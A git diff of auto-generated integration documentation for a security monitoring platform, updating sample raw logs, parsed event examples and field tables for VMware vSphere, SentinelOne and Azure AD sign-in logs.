a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md +++ b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md @@ -44,6 +44,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "other_tests_example1_type_7" + + ``` + Event [11111111] [1-1] [2024-06-18T23:41:05.366919Z] [vim.event.ScheduledTaskCompletedEvent] [info] [com.vmware.vcIntegrity] [] [22222222] [Task VMware vSphere Update Manager Check Notification on Datacenters in datacenter completed successfully] + ``` + + + +=== "other_tests_example2_type_7" + + ``` + Event [11111111] [1-1] [2024-06-18T23:28:06.155764Z] [vim.event.EventEx] [info] [System] [Datacenter] [11111111] [Hardware Sensor Status: Processor Green, Memory Green, Fan Green, Voltage Green, Temperature Green, Power Green, System Board Green, Battery Green, Storage Green, Other Green] + ``` + + + === "others_events" ``` @@ -71,15 +87,7 @@ In this section, you will find examples of raw logs as generated natively by the === "others_events_type3" ``` - 2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure) - ``` - - - -=== "others_events_type4" - - ``` - Desired survivor size 1572864 bytes, new threshold 1 (max 15) + 2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure)] ``` @@ -180,6 +188,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "session_logs_type3_wo_hostname" + + ``` + Event [11111111] [1-1] [2024-06-18T22:45:08.003776Z] [vim.event.UserLogoutSessionEvent] [info] [root\example] [] [22222222] [User root\example@127.0.0.1 logged out (login time: Tuesday, 18 June, 2024 10:45:07 PM, number of API invocations: 2, user agent: VMware vim-java 1.0)] + ``` + + + === "session_logs_type4" ``` diff --git a/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md b/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md index bd90f999cb..03bf80f489 100644 --- a/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md +++ b/_shared_content/operations_center/integrations/generated/064f7e8b-ce5f-474d-802e-e88fe2193365.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "attack_discovery_detection_event.json" diff --git a/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md b/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md index 09f0c245fa..c7e88d567d 100644 --- a/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md +++ b/_shared_content/operations_center/integrations/generated/07c0cac8-f68f-11ea-adc1-0242ac120002.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "accept.json" diff --git a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md index 347b729378..31ff406f71 100644 --- a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md +++ b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "activities.json" @@ -728,7 +728,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"accountId\": \"123456789831564686\", \"activityType\": 5126, \"agentId\": \"1098352279374896038\", \"agentUpdatedVersion\": null, \"applications\": null, \"comments\": null, \"createdAt\": \"2022-03-29T17:20:31.139698Z\", \"data\": {\"accountName\": \"CORP\", \"bluetoothAddress\": \"\", \"computerName\": \"CORP123\", \"creator\": \"N/A\", \"deviceClass\": \"E0h\", \"deviceInformationServiceInfoKey\": \"\", \"deviceInformationServiceInfoValue\": \"\", \"deviceName\": \"\", \"eventId\": \"{1988659d-af84-11ec-914c-806e6f6e6963}\", \"eventTime\": \"2022-03-29T17:17:40.622+00:00\", \"eventType\": \"connected\", \"fullScopeDetails\": \"Group Default Group in Site CORP-Users of Account CORP\", \"fullScopeDetailsPath\": \"Global / CORP / CORP-Users / Default Group\", \"gattService\": \"\", \"groupId\": \"1083054176758610128\", \"groupName\": \"Default Group\", \"interface\": \"USB\", \"lastLoggedInUserName\": \"user.name\", \"lmpVersion\": \"N/A\", \"manufacturerName\": \"\", \"minorClass\": \"N/A\", \"osType\": \"windows\", \"productId\": \"AAA\", \"profileUuids\": \"N/A\", \"ruleId\": -1, \"ruleName\": null, \"ruleScopeName\": null, \"ruleType\": \"productId\", \"scopeLevel\": \"Group\", \"scopeName\": \"Default Group\", \"siteName\": \"CORP-Users\", \"uid\": \"\", \"vendorId\": \"8087\", \"version\": \"N/A\"}, \"description\": null, \"groupId\": \"1083054176758610128\", \"hash\": null, \"id\": \"1387019684138751044\", \"osFamily\": null, \"primaryDescription\": \"USB device was connected on CORP123.\", \"secondaryDescription\": null, \"siteId\": \"1083054176741832911\", \"threatId\": null, \"updatedAt\": \"2022-03-29T17:20:30.998054Z\", \"userId\": null}", + "message": "{\"accountId\": \"123456789831564686\", \"activityType\": 5126, \"agentId\": \"1098352279374896038\", \"agentUpdatedVersion\": null, \"applications\": null, \"comments\": null, \"createdAt\": \"2022-03-29T17:20:31.139698Z\", \"data\": {\"accountName\": \"CORP\", \"bluetoothAddress\": \"\", \"computerName\": \"CORP123\", \"creator\": \"N/A\", \"deviceClass\": \"E0h\", \"deviceInformationServiceInfoKey\": \"\", \"deviceInformationServiceInfoValue\": \"\", \"deviceName\": \"\", \"eventId\": \"{1988659d-af84-11ec-914c-806e6f6e6963}\", \"eventTime\": \"2022-03-29T17:17:40.622+00:00\", \"eventType\": \"connected\", \"fullScopeDetails\": \"Group Default Group in Site CORP-Users of Account CORP\", \"fullScopeDetailsPath\": \"Global / CORP / CORP-Users / Default Group\", \"gattService\": \"\", \"groupId\": \"1083054176758610128\", \"groupName\": \"Default Group\", \"interface\": \"USB\", \"lastLoggedInUserName\": \"user.name\", \"lmpVersion\": \"N/A\", \"manufacturerName\": \"\", \"minorClass\": \"N/A\", \"osType\": \"windows\", \"productId\": \"AAA\", \"profileUuids\": \"N/A\", \"ruleId\": -1, \"ruleName\": null, \"ruleScopeName\": null, \"ruleType\": \"productId\", \"scopeLevel\": \"Group\", \"scopeName\": \"Default Group\", \"siteName\": \"CORP-Users\", \"uid\": \"\", \"vendorId\": \"8A87\", \"version\": \"N/A\"}, \"description\": null, \"groupId\": \"1083054176758610128\", \"hash\": null, \"id\": \"1387019684138751044\", \"osFamily\": null, \"primaryDescription\": \"USB device was connected on CORP123.\", \"secondaryDescription\": null, \"siteId\": \"1083054176741832911\", \"threatId\": null, \"updatedAt\": \"2022-03-29T17:20:30.998054Z\", \"userId\": null}", "event": { "action": "Device Control Approved Event", "category": "host", @@ -768,7 +768,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "eventType": "connected", "fullScopeDetails": "Group Default Group in Site CORP-Users of Account CORP", "fullScopeDetailsPath": "Global / CORP / CORP-Users / Default Group", - "groupId": 1083054176758610128, + "group": { + "id": "1083054176758610128" + }, "groupName": "Default Group", "interface": "USB", "lastLoggedInUserName": "user.name", @@ -781,7 +783,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "scopeLevel": "Group", "scopeName": "Default Group", "siteName": "CORP-Users", - "vendorId": 8087, "version": "N/A" }, "eventid": 1387019684138751044, @@ -2638,7 +2639,7 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.data.current` | `keyword` | | |`sentinelone.data.deactivatedEngines` | `keyword` | | |`sentinelone.data.deactivationPeriodInDays` | `keyword` | | -|`sentinelone.data.detectedat` | `long` | | +|`sentinelone.data.detectedat` | `date` | | |`sentinelone.data.deviceClass` | `keyword` | | |`sentinelone.data.deviceInformationServiceInfoKey` | `keyword` | | |`sentinelone.data.deviceInformationServiceInfoValue` | `keyword` | | @@ -2666,7 +2667,7 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.data.fullScopeDetailsPath` | `keyword` | | |`sentinelone.data.gattService` | `keyword` | | |`sentinelone.data.globalStatus` | `keyword` | | -|`sentinelone.data.groupId` | `long` | | +|`sentinelone.data.group.id` | `keyword` | | |`sentinelone.data.groupName` | `keyword` | | |`sentinelone.data.indicatorcategory` | `keyword` | | |`sentinelone.data.indicatordescription` | `keyword` | | @@ -2822,7 +2823,6 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.data.userScope` | `keyword` | | |`sentinelone.data.userscope` | `keyword` | | |`sentinelone.data.uuid` | `keyword` | | -|`sentinelone.data.vendorId` | `long` | | |`sentinelone.data.version` | `keyword` | | |`sentinelone.description` | `keyword` | | |`sentinelone.eventid` | `long` | | @@ -2849,7 +2849,6 @@ The following table lists the fields that are extracted, normalized under the EC |`sentinelone.threatInfo.classificationSource` | `keyword` | | |`sentinelone.threatInfo.cloudFilesHashVerdict` | `keyword` | | |`sentinelone.threatInfo.collectionId` | `keyword` | | -|`sentinelone.threatInfo.detectionEngines` | `object` | | |`sentinelone.threatInfo.detectionType` | `keyword` | | |`sentinelone.threatInfo.engines` | `keyword` | | |`sentinelone.threatInfo.externalTicketExists` | `bool` | | diff --git a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md index abb5a7d618..2bce2d791f 100644 --- a/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md +++ b/_shared_content/operations_center/integrations/generated/07c556c0-0675-478c-9803-e7990afe78b6_sample.md @@ -518,7 +518,7 @@ In this section, you will find examples of raw logs as generated natively by the "scopeName": "Default Group", "siteName": "CORP-Users", "uid": "", - "vendorId": "8087", + "vendorId": "8A87", "version": "N/A" }, "description": null, diff --git a/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md b/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md index 5b8a3cafd1..ada69810ce 100644 --- a/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md +++ b/_shared_content/operations_center/integrations/generated/0ba58f32-7dba-4084-ab17-90c0be6b1f10.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "http.json" diff --git a/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md b/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md index 3f3594dcee..c43b82f61c 100644 --- a/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md +++ b/_shared_content/operations_center/integrations/generated/0de050fb-3f56-4c7a-a9b6-76bf5298a617.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "malop_connection.json" diff --git a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md index 0122c66883..614e049ea4 100644 --- a/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md +++ b/_shared_content/operations_center/integrations/generated/10999b99-9a8d-4b92-9fbd-01e3fac01cd5.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "telemetry_event.json" diff --git a/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md b/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md index aab1f6ea99..acb14577a4 100644 --- a/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md +++ b/_shared_content/operations_center/integrations/generated/162064f0-c594-455e-ac24-2d7129137688.md @@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth_conversation_failed.json" diff --git a/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md b/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md index 7818607d55..e965b436bb 100644 --- a/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md +++ b/_shared_content/operations_center/integrations/generated/16676d72-463e-4b8a-b13a-f8dd48cddc8c.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "403.json" diff --git a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md index 7aba955134..dde7feb8c0 100644 --- a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md +++ b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "add_domain.json" @@ -326,85 +326,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "auth.json" - - ```json - - { - "message": "{\"id\":\"39e3a81e-99b9-4a30-8000-f38a970e5100\",\"createdDateTime\":\"2020-09-28T10:12:41.4104242Z\",\"userDisplayName\":\"Jane Doe\",\"userPrincipalName\":\"jane.doe@sekoiacorp.onmicrosoft.com\",\"userId\":\"913f4b76-e10f-4f1c-aaf1-09356389319b\",\"appId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"appDisplayName\":\"O365 Suite UX\",\"ipAddress\":\"11.11.11.11\",\"clientAppUsed\":\"Browser\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\",\"correlationId\":\"26e7584c-876b-425f-9119-49b411e21365\",\"conditionalAccessStatus\":\"notApplied\",\"originalRequestId\":\"39e3a81e-99b9-4a30-8000-f38a970e5100\",\"isInteractive\":false,\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"processingTimeInMilliseconds\":101,\"riskDetail\":\"hidden\",\"riskLevelAggregated\":\"hidden\",\"riskLevelDuringSignIn\":\"hidden\",\"riskState\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"resourceDisplayName\":\"Windows Azure Active Directory\",\"resourceId\":\"00000002-0000-0000-c000-000000000000\",\"resourceTenantId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"authenticationMethodsUsed\":[],\"authenticationRequirement\":\"multiFactorAuthentication\",\"alternateSignInName\":null,\"servicePrincipalName\":null,\"signInEventTypes\":[],\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0,\"failureReason\":\"Other.\",\"additionalDetails\":\"MFA requirement satisfied by claim in the token\"},\"deviceDetail\":{\"deviceId\":\"\",\"displayName\":null,\"operatingSystem\":\"Windows 10\",\"browser\":\"Firefox 81.0\",\"isCompliant\":null,\"isManaged\":null,\"trustType\":null},\"location\":{\"city\":\"Paris\",\"state\":\"Paris\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"altitude\":null,\"latitude\":48.861000061035156,\"longitude\":2.3380000591278076}},\"mfaDetail\":{\"authMethod\":null,\"authDetail\":null},\"appliedConditionalAccessPolicies\":[],\"authenticationProcessingDetails\":[{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"networkLocationDetails\":[],\"authenticationDetails\":[{\"authenticationStepDateTime\":\"2020-09-28T10:12:41.4104242Z\",\"authenticationMethod\":null,\"authenticationMethodDetail\":null,\"succeeded\":true,\"authenticationStepResultDetail\":\"MFA requirement satisfied by claim in the token\",\"authenticationStepRequirement\":\"User\"}],\"authenticationRequirementPolicies\":[]}", - "event": { - "category": [ - "authentication" - ], - "type": [ - "start" - ] - }, - "@timestamp": "2020-09-28T10:12:41.410424Z", - "action": { - "name": "authentication", - "target": "user" - }, - "azuread": { - "authenticationDetails": [ - { - "authenticationMethod": null, - "authenticationMethodDetail": null, - "authenticationStepDateTime": "2020-09-28T10:12:41.4104242Z", - "authenticationStepRequirement": "User", - "authenticationStepResultDetail": "MFA requirement satisfied by claim in the token", - "succeeded": true - } - ], - "authenticationRequirement": "multiFactorAuthentication", - "authenticationRequirementPolicies": [], - "correlationId": "26e7584c-876b-425f-9119-49b411e21365", - "resourceId": "00000002-0000-0000-c000-000000000000", - "resourceTenantId": "aa09a079-7796-46a8-a4d4-4d21b0dcf1b2", - "tokenIssuerType": "AzureAD" - }, - "host": { - "os": { - "name": "Windows 10" - } - }, - "related": { - "ip": [ - "11.11.11.11" - ], - "user": [ - "jane.doe@sekoiacorp.onmicrosoft.com" - ] - }, - "service": { - "name": "Windows Azure Active Directory", - "type": "ldap" - }, - "source": { - "address": "11.11.11.11", - "ip": "11.11.11.11" - }, - "user": { - "id": "913f4b76-e10f-4f1c-aaf1-09356389319b", - "name": "jane.doe@sekoiacorp.onmicrosoft.com" - }, - "user_agent": { - "device": { - "name": "Other" - }, - "name": "Firefox", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0", - "os": { - "name": "Windows", - "version": "10" - }, - "version": "81.0" - } - } - - ``` - - === "change_user_password.json" ```json @@ -472,6 +393,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "id": "00000000-0000-0000-0000-000000000000", + "type": [ + "start" ] }, "@timestamp": "2022-04-05T13:07:16.779653Z", @@ -480,6 +405,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 1, + "StatusSequence": 0, + "authenticationMethod": "Password", + "authenticationMethodDetail": "Password Hash Sync", + "authenticationStepDateTime": "2022-04-05T13:07:16.7796535+00:00", + "authenticationStepRequirement": "Primary authentication", + "succeeded": true + } + ], "callerIpAddress": "2001:0db8:85a3:0000:0000:8a2e:0370:7334", "category": "SignInLogs", "correlationId": "7ee10819-f631-4ab1-8edb-4efb7286baba", @@ -529,7 +465,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "jean.dupont@corp.com", - "full_name": "DUPONT Jean" + "full_name": "DUPONT Jean", + "id": "a1c4edf3-59b6-40a8-a1cd-820691c0bab0" }, "user_agent": { "device": { @@ -609,7 +546,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "authentication" ], - "reason": "External security challenge was not satisfied." + "reason": "External security challenge was not satisfied.", + "type": [ + "start" + ] }, "@timestamp": "2022-03-30T14:52:21.706218Z", "action": { @@ -617,6 +557,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 0, + "StatusSequence": 0, + "authenticationMethod": "Previously satisfied", + "authenticationStepDateTime": "2022-03-30T14:52:21.7062186+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "First factor requirement satisfied by claim in the token", + "succeeded": true + } + ], "callerIpAddress": "11.11.11.11", "category": "SignInLogs", "correlationId": "e68960e2-8996-448c-ba7a-e54eeb8ff2ed", @@ -677,7 +628,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "User.Name@corp.name", - "full_name": "User Name" + "full_name": "User Name", + "id": "469a0b32-4a8d-4b73-89aa-25ab78df7523" }, "user_agent": { "device": { @@ -705,6 +657,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "id": "00000000-0000-0000-0000-000000000000", + "type": [ + "start" ] }, "@timestamp": "2022-03-31T12:26:46.019095Z", @@ -713,6 +669,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 0, + "StatusSequence": 0, + "authenticationMethod": "Previously satisfied", + "authenticationStepDateTime": "2022-03-31T12:26:46.0190957+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "First factor requirement satisfied by claim in the token", + "succeeded": true + } + ], "callerIpAddress": "11.11.11.11", "category": "SignInLogs", "correlationId": "467c1340-0762-40d2-b6fb-339235633ebb", @@ -773,7 +740,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "admin.jdupont@corp.net", - "full_name": "Admin Jean Dupont" + "full_name": "Admin Jean Dupont", + "id": "16cc2d55-637f-4e04-850d-a1048b659112" }, "user_agent": { "device": { @@ -801,6 +769,10 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "id": "00000000-0000-0000-0000-000000000000", + "type": [ + "start" ] }, "@timestamp": "2023-08-16T15:32:05.577260Z", @@ -809,6 +781,26 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [ + { + "RequestSequence": 1, + "StatusSequence": 0, + "authenticationMethod": "Password", + "authenticationMethodDetail": "Pass-through Authentication", + "authenticationStepDateTime": "2023-08-16T15:28:23.3045933+00:00", + "authenticationStepRequirement": "Primary authentication", + "succeeded": true + }, + { + "RequestSequence": 1692199690724, + "StatusSequence": 1692199702901, + "authenticationMethod": "Mobile app notification", + "authenticationStepDateTime": "2023-08-16T15:28:22+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "MFA successfully completed", + "succeeded": true + } + ], "callerIpAddress": "1.2.3.4", "category": "SignInLogs", "correlationId": "93f63260-ad9a-4087-b7e0-d9010cb919dd", @@ -869,7 +861,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "john.doe@example.org", - "full_name": "John DOE" + "full_name": "John DOE", + "id": "93f63260-ad9a-4087-b7e0-d9010cb919dd" }, "user_agent": { "device": { @@ -896,6 +889,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "event": { "category": [ "authentication" + ], + "type": [ + "start" ] }, "@timestamp": "2023-10-04T13:09:02.679994Z", @@ -904,6 +900,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "azuread": { "Level": 4, + "authenticationDetails": [], "callerIpAddress": "11.11.11.11", "category": "SignInLogs", "correlationId": "e68960e2-8996-448c-ba7a-e54eeb8ff2ed", @@ -973,7 +970,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "user": { "email": "jane.doe@example.org", - "full_name": "Jane DOE" + "full_name": "Jane DOE", + "id": "469a0b32-4a8d-4b73-89aa-25ab78df7523" }, "user_agent": { "device": { diff --git a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md index a95ad55045..40f9d902e0 100644 --- a/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md +++ b/_shared_content/operations_center/integrations/generated/19cd2ed6-f90c-47f7-a46b-974354a107bb_sample.md @@ -312,99 +312,6 @@ In this section, you will find examples of raw logs as generated natively by the -=== "auth" - - - ```json - { - "id": "39e3a81e-99b9-4a30-8000-f38a970e5100", - "createdDateTime": "2020-09-28T10:12:41.4104242Z", - "userDisplayName": "Jane Doe", - "userPrincipalName": "jane.doe@sekoiacorp.onmicrosoft.com", - "userId": "913f4b76-e10f-4f1c-aaf1-09356389319b", - "appId": "4345a7b9-9a63-4910-a426-35363201d503", - "appDisplayName": "O365 Suite UX", - "ipAddress": "11.11.11.11", - "clientAppUsed": "Browser", - "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0", - 